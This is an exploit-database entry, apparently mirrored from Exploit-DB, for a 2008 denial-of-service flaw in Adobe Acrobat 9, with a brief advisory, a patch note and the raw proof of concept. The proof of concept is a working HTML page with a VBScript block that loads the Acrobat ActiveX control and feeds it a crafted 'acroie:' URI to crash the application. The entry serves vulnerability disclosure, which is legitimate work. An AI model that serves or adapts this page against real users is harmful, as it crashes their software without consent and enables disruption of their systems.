header-logo
Suggest Exploit
vendor:
Acrobat
by:
Jeremy Brown
7.8
CVSS
HIGH
Denial of Service
20
CWE
Product Name: Acrobat
Affected Version From: Adobe Acrobat 9
Affected Version To: Adobe Acrobat 9
Patch Exists: Yes
Related CWE: N/A
CPE: a:adobe:acrobat:9.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista, IE7
2008

Adobe Acrobat 9 Remote DoS

Jeremy Brown discovered a vulnerability in Adobe Acrobat 9 which allows remote attackers to cause a denial of service via a crafted URI. The vulnerability exists due to the application failing to properly handle certain URIs. An attacker can exploit this vulnerability by enticing a user to open a malicious URI.

Mitigation:

Adobe has released an update to address this vulnerability. Users are advised to update to the latest version of Adobe Acrobat 9.
Source

Exploit-DB raw data:

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
     Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
     I can't seem to reproduce this on XP! Oh well.
     Of course the most popular app for reading pdfs is SfS/SfI :)
     Basically it will crash with any uri that adobe doesn't like.
     Also interesting: try with file:///DoS and look in bottom left area -->

<html><body>

<object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript>

arg1="acroie:///DoS"
target.src = arg1

</script>
</body></html>

# milw0rm.com [2008-09-11]

Navigation

Suggest Exploit

Services By CQR